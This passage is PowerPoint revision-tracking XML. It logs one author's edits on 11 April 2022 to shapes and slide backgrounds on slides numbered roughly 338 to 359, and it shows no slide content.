        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3908142614" sldId="338"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3908142614" sldId="338"/>
            <ac:spMk id="2" creationId="{8472B648-1BBD-724A-B667-41635421F45D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3908142614" sldId="338"/>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1505617189" sldId="339"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1505617189" sldId="339"/>
            <ac:spMk id="2" creationId="{8472B648-1BBD-724A-B667-41635421F45D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1505617189" sldId="339"/>
            <ac:spMk id="12" creationId="{D85DFEA8-DF12-5343-82E1-1278AFF307DD}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2816901977" sldId="340"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2816901977" sldId="340"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2816901977" sldId="340"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3033514502" sldId="341"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3033514502" sldId="341"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3033514502" sldId="341"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1999220309" sldId="342"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1999220309" sldId="342"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1999220309" sldId="342"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2660760668" sldId="343"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2660760668" sldId="343"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2660760668" sldId="343"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3348853242" sldId="344"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3348853242" sldId="344"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3348853242" sldId="344"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="994684150" sldId="345"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="994684150" sldId="345"/>
            <ac:spMk id="2" creationId="{E5A51831-90DF-45E7-90C3-A8F2A9DFCE43}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="994684150" sldId="345"/>
            <ac:spMk id="4" creationId="{C02050B0-7F92-4F26-BABB-12C26C7FB991}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2982070734" sldId="346"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2982070734" sldId="346"/>
            <ac:spMk id="2" creationId="{ECBED449-E11D-4180-B6F1-612E4CFD1281}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2982070734" sldId="346"/>
            <ac:spMk id="3" creationId="{A7546283-C9DB-49E7-A3E5-AB89F903CF36}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2292537709" sldId="347"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2292537709" sldId="347"/>
            <ac:spMk id="2" creationId="{F0A4AE97-C15B-46FD-B077-BFA5F25660E9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2292537709" sldId="347"/>
            <ac:spMk id="3" creationId="{A2863C11-B258-4C4B-8507-B49CD134CD8A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2292537709" sldId="347"/>
            <ac:spMk id="10" creationId="{6ACF2E97-F597-4984-9F36-7B28D376302B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1745648681" sldId="348"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1745648681" sldId="348"/>
            <ac:spMk id="2" creationId="{0A87613C-0EB6-44A1-BE1B-52921845ED87}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1745648681" sldId="348"/>
            <ac:spMk id="3" creationId="{D7E4C528-EDF2-4F7D-9175-723F31897D26}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1745648681" sldId="348"/>
            <ac:spMk id="5" creationId="{32761301-1C41-4B94-BBC9-BE4A94DD734A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2955581017" sldId="349"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2955581017" sldId="349"/>
            <ac:spMk id="2" creationId="{0A87613C-0EB6-44A1-BE1B-52921845ED87}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2955581017" sldId="349"/>
            <ac:spMk id="3" creationId="{D7E4C528-EDF2-4F7D-9175-723F31897D26}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3534360932" sldId="350"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3534360932" sldId="350"/>
            <ac:spMk id="2" creationId="{C12E7632-0BD4-49DA-A83E-BB1A93BB31A0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3534360932" sldId="350"/>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1878895702" sldId="351"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1878895702" sldId="351"/>
            <ac:spMk id="2" creationId="{E2AD18AD-B00B-4781-A52B-446508BED037}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1878895702" sldId="351"/>
            <ac:spMk id="4" creationId="{EC41605A-88E2-41EF-9A27-918A26D272A2}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1510679252" sldId="352"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1510679252" sldId="352"/>
            <ac:spMk id="2" creationId="{E2AD18AD-B00B-4781-A52B-446508BED037}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1510679252" sldId="352"/>
            <ac:spMk id="4" creationId="{EC41605A-88E2-41EF-9A27-918A26D272A2}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3485928462" sldId="353"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3485928462" sldId="353"/>
            <ac:spMk id="2" creationId="{44E0B21D-A591-413D-8FB1-FC5FA3A919EF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3485928462" sldId="353"/>
            <ac:spMk id="3" creationId="{ADA8A7CC-9CFC-4FF6-AA1E-21A42E4BBC5F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2978378768" sldId="354"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2978378768" sldId="354"/>
            <ac:spMk id="2" creationId="{99FF7A17-31E6-4A84-82F9-CDA473859978}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2978378768" sldId="354"/>
            <ac:spMk id="3" creationId="{8F580A32-61F8-4551-8183-F933C3A605B5}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3574974175" sldId="355"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3574974175" sldId="355"/>
            <ac:spMk id="2" creationId="{C12E7632-0BD4-49DA-A83E-BB1A93BB31A0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3574974175" sldId="355"/>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64942639" sldId="356"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="64942639" sldId="356"/>
            <ac:spMk id="2" creationId="{092CE8F0-6D07-4093-AF32-4D3587DC2F68}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="64942639" sldId="356"/>
            <ac:spMk id="4" creationId="{CA39CDEA-8CD7-4096-AD78-269346B1BC45}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="561609990" sldId="357"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="561609990" sldId="357"/>
            <ac:spMk id="2" creationId="{47913D8D-52DA-42C9-B5D1-25E771089E50}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="561609990" sldId="357"/>
            <ac:spMk id="3" creationId="{0B72D3B1-41C5-45D3-955C-840C61DA9A9A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2674734406" sldId="358"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2674734406" sldId="358"/>
            <ac:spMk id="2" creationId="{DB8F2898-85D9-4AAF-A6D9-3B62A78B7A48}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2674734406" sldId="358"/>
            <ac:spMk id="3" creationId="{40B17BE4-F439-4A57-BF90-1E9E27C8808C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2520940080" sldId="359"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2520940080" sldId="359"/>
            <ac:spMk id="2" creationId="{DB8F2898-85D9-4AAF-A6D9-3B62A78B7A48}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2520940080" sldId="359"/>
